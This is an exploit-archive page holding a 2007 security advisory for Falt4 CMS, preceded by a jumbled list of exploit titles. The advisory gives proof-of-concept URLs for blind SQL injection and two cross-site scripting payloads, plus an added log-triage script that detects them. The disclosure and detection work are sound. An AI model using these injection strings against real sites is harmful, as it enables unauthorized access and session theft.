
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow 
Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
H - Security Labs
Falt4 CMS (RC4 10.9.2007) Security Report /Advisory
ID : HSEC#20071012

General Information
--------------------------
Name : Falt4Extreme CMS (RC4 10.9.2007)
Vendor HomePage : http://sourceforge.net/projects/falt4/
Platforms : PHP && MySQL
Vulnerability Type : Input Validation Errors

Disclosure Timeline
-------------------------
04 December 2007 -- Vendor Contacted
04 December 2007 -- Vendor Replied
05 December 2007 -- Fix Released
10 December 2007 -- Public Disclosure

What is Falt4Extreme
------------------------
Falt4 CMS is a business approved Content Management System (CMS) under the LGPL. The CMS is feature-rich and has a clean administration area. The ultimate CMS with functions for the professional, usable by everyone. CMS modules are available.

Overview of Vulnerabilities
------------------------
The script is vulnerable to both XSS and Blind SQL Injection attacks.

Details of Vulnerabilities
------------------------
1-Blind SQL Injection Vulnerability:
http://www.EXAMPLE.com/falt4/index.php?handler=cat&nav_ID=1'%20and%20'1'='1
The nav_ID parameter is not properly sanitized and can be used for Blind SQL Injection attacks.

2-Cross Site Scripting Vulnerabilities
i. http://www.EXAMPLE.com/falt4/index.php?handler=>"><script>alert(3)</script>&nav_ID=1
Input passed to the 'handler' parameter is not properly sanitized before use and can be used by malicious people to perform XSS attacks.
ii. http://www.EXAMPLE.com/falt4/modules/feed/feed.php?type=rss&lang=1&topic=>"><script>alert(2)</script>
Input passed to the 'topic' parameter is not properly sanitized before use and can be used by malicious people to perform XSS attacks.
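
Added example (not part of the advisory or of the Falt4 code base): a Python access-log triage that flags requests in which the three parameters named above (nav_ID, handler, topic) carry values outside an expected shape. The allow-list patterns, the benign value "news" and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters named in the advisory. The "legitimate" shapes are assumptions,
# not taken from the Falt4 source: numeric ID, plain module name, simple token.
EXPECTED = {
    "nav_ID": re.compile(r"\d+"),
    "handler": re.compile(r"[A-Za-z0-9_]+"),
    "topic": re.compile(r"[A-Za-z0-9_-]*"),
}
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log (documentation addresses), not real traffic.
SAMPLE_LOG = """
192.0.2.10 - - [11/Dec/2007:10:00:01 +0000] "GET /falt4/index.php?handler=cat&nav_ID=1 HTTP/1.1" 200 5120
192.0.2.77 - - [11/Dec/2007:10:00:05 +0000] "GET /falt4/index.php?handler=cat&nav_ID=1'%20and%20'1'='1 HTTP/1.1" 200 5120
192.0.2.77 - - [11/Dec/2007:10:00:09 +0000] "GET /falt4/index.php?handler=%3E%22%3E%3Cscript%3Ealert(3)%3C/script%3E&nav_ID=1 HTTP/1.1" 200 4870
192.0.2.77 - - [11/Dec/2007:10:00:12 +0000] "GET /falt4/modules/feed/feed.php?type=rss&lang=1&topic=%3E%22%3E%3Cscript%3Ealert(2)%3C/script%3E HTTP/1.1" 200 912
192.0.2.10 - - [11/Dec/2007:10:00:20 +0000] "GET /falt4/modules/feed/feed.php?type=rss&lang=1&topic=news HTTP/1.1" 200 2048
""".strip().splitlines()


def suspicious_params(target):
    """Return the advisory parameters in a request target whose decoded
    value does not have the expected shape."""
    bad = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        pattern = EXPECTED.get(name)
        if pattern is not None and not pattern.fullmatch(value):
            bad.add(name)
    return sorted(bad)


def triage(log_lines):
    """Return (line_number, target, bad_params) for each request to review."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            bad = suspicious_params(match.group(1))
            if bad:
                hits.append((number, match.group(1), bad))
    return hits


if __name__ == "__main__":
    for number, target, bad in triage(SAMPLE_LOG):
        print(f"line {number}: {', '.join(bad)} -> {target}")
```

The same shape checks are what strict server-side input validation would enforce for these parameters; tighten the patterns to the values a given installation actually uses.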

Solution
-----------------------
Re-download falt4 from sourceforge:
http://downloads.sourceforge.net/falt4/falt4extreme.zip?use_mirror=osdn
Replace these files:
/yourfalt4/index.php
/yourfalt4/modules/feed.php
/yourfalt4/admin/index.php

-----------------------
The vulnerabilities were found on 04 December 2007
by Mesut Timur <mesut@h-labs.org>
H - Security Labs , http://www.h-labs.org
Gebze Institute of Technology, Computer Engineering, http://www.gyte.edu.tr

References
-----------------------
Vendor Confirmation : http://sourceforge.net/forum/forum.php?forum_id=762931
Original Advisory : http://www.h-labs.org/blog/2007/12/05/falt4_cms_security_report_advisory.html
http://sourceforge.net/projects/falt4/
http://www.h-labs.org

# milw0rm.com [2007-12-10]